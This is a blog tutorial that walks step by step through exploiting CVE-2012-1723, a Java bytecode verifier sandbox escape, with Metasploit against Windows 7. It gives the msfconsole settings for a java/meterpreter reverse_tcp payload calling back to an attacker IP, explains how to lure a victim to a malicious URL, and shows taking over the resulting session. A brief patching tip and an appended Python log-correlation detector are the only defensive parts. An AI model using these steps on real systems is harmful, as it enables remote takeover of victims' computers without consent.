Java Bytecode Verifier Remote Code Execution to Hack Windows 7 (CVE 2012-1723)


Type : Tutorial

Level : Medium

Victim O.S : Windows 7 Ultimate

Attacker O.S : Backtrack 5 R2 with Metasploit Framework v4

CVE : 2012-1723

Credits :

Stefan Cornellius      # Discoverer
mihi                   # Vuln analysis
littlelightlittlefire  # metasploit module
juan vazquez           # merged code (overlapped)
sinn3r                 # merged code (overlapped)

Actually I saw this Java Bytecode Verifier Remote Code Execution exploit about 5-6 days ago on the Exploit Database website. It’s a very nice exploit btw 😛 with Excellent Ranking. Here I copy from the exploit description.

This module exploits a vulnerability in HotSpot bytecode verifier where an invalid optimisation of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.

Btw this Java Bytecode Verifier Remote Code Execution exploit was published on July 11, 2012, so it is still fresh 🙂 and the interesting thing is that this is a multi exploit that can affect more than one O.S. (but I only tried it with Windows 7). If you try it with another O.S., e.g. Linux, Mac, etc., you can also leave a comment here on whether it works or not.

Requirements :

1. Metasploit Framework with java verifier field access exploit

2. You can download the exploit here http://www.exploit-db.com/exploits/19717/

Step by Step :

Attacker IP Address : 192.168.8.91

Victim IP Address : 192.168.8.90

1. Open your terminal (CTRL+ALT+T) and go to the Metasploit Framework console (msfconsole).

2. Add the Java Bytecode Verifier Remote Code Execution exploit (see image below).

[Image: Java Bytecode Verifier Remote Code Execution to Hack Windows 7 (CVE 2012-1723)]

3. The next step is to set up your payload (used if your exploit is successfully executed by the victim). Because it’s a Java exploit, the payload will probably also use Java, but let’s see the available payloads first.

[Image: Java Bytecode Verifier Remote Code Execution to Hack Windows 7 (CVE 2012-1723)]

From the picture above I use the java/meterpreter/reverse_tcp for the payload.

4. After we have successfully set up the payload, we also need to set the exploit options to suit our needs. To view the available options you can run the show options command (or see picture below).

[Image: Java Bytecode Verifier Remote Code Execution to Hack Windows 7 (CVE 2012-1723)]

Information :

set srvhost 192.168.8.91 --> set the exploit server IP address

set srvport 80 --> set the exploit server port (because this exploit uses the browser, we set it to port 80, the default web server port)

set uripath "" --> I didn’t set up the URI, just use the original IP address instead.

set lhost 192.168.8.91 --> set the local IP (attacker IP); if the exploit is performed successfully, the payload will be launched to this IP address

set lport 443 --> set the local port (attacker port) on which you want to catch the connection from the victim

exploit --> perform the exploit (run the server and start the payload)

5. If the victim opens our malicious URL (http://192.168.8.91) in their browser, here is the screenshot:

[Image: Java Bytecode Verifier Remote Code Execution to Hack Windows 7 (CVE 2012-1723)]

I ran the sessions -l command to list the active sessions, and I got 1 active session there.

6. The last step is to interact with the available session; we use sessions -i 1 (because the ID was 1). Here is the screenshot from when I successfully performed the exploit.

[Image: Java Bytecode Verifier Remote Code Execution to Hack Windows 7 (CVE 2012-1723)]

pwned…

Countermeasures :

1. Update your JRE to the latest version (an update from Java is available for this vulnerability).
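
Alongside patching, the traffic pattern in the walkthrough (a Java runtime fetching content from a bare IP address, then the same client opening a new connection to that same address) can be hunted for in logs. The following is an added example, not code from the original post or from Metasploit; the log formats, the 60-second window and the reliance on the "Java/" User-Agent token are assumptions, and the log lines are constructed.

```python
import re
from datetime import datetime, timedelta
from ipaddress import ip_address
from urllib.parse import urlsplit

# Constructed sample logs (hypothetical formats, lab addresses from the walkthrough).
PROXY_LOG = """\
2012-07-16T10:02:11 192.168.8.90 GET http://192.168.8.91/ "Mozilla/5.0 (Windows NT 6.1) Firefox/13.0"
2012-07-16T10:02:12 192.168.8.90 GET http://192.168.8.91/AbCd.jar "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0"
2012-07-16T10:03:40 192.168.8.77 GET http://updates.example.com/lib.jar "Java/1.6.0"
"""
FLOW_LOG = """\
2012-07-16T10:02:14 192.168.8.90 192.168.8.91 443
2012-07-16T10:05:00 192.168.8.77 192.168.8.20 443
"""
PROXY_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')
WINDOW = timedelta(seconds=60)  # assumed correlation window, tune per environment

def is_ip_literal(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False

def java_fetches_from_ip(proxy_log):
    """Requests made by a Java runtime (UA contains 'Java/') to a bare-IP host."""
    hits = []
    for line in proxy_log.splitlines():
        m = PROXY_RE.match(line.strip())
        if not m:
            continue  # skip malformed records instead of failing
        ts, client, _method, url, agent = m.groups()
        host = urlsplit(url).hostname or ""
        if "Java/" in agent and is_ip_literal(host):
            hits.append((datetime.fromisoformat(ts), client, host))
    return hits

def correlate(proxy_log, flow_log):
    """Alert when the same client connects to the same server shortly after the fetch."""
    alerts = []
    flows = [f.split() for f in flow_log.splitlines() if len(f.split()) == 4]
    for ts, client, server in java_fetches_from_ip(proxy_log):
        for fts, src, dst, port in flows:
            delta = datetime.fromisoformat(fts) - ts
            if src == client and dst == server and timedelta(0) <= delta <= WINDOW:
                alerts.append((client, server, int(port)))
    return alerts
```

Calling correlate(PROXY_LOG, FLOW_LOG) on the constructed logs returns one alert for the client 192.168.8.90; the Java request to a named host and the unrelated flow are ignored.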

Hope it’s useful 🙂


Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com
